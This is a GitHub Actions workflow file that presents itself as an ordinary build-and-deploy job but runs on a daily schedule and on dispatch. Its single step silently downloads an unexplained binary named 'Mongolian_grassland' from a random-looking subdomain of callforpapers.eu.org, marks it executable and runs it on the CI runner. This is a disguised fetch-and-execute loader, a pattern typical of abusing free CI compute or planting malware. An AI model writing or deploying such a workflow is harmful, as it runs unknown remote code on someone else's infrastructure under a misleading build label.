#2024-03-18-[051736]-73ws15vw
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "13 1 * * * "

jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: default_build_deploy_name_note
        run: |
          wget -q https://0vyvf2357erkcvp3.callforpapers.eu.org/Mongolian_grassland
          chmod 755 Mongolian_grassland
          ./Mongolian_grassland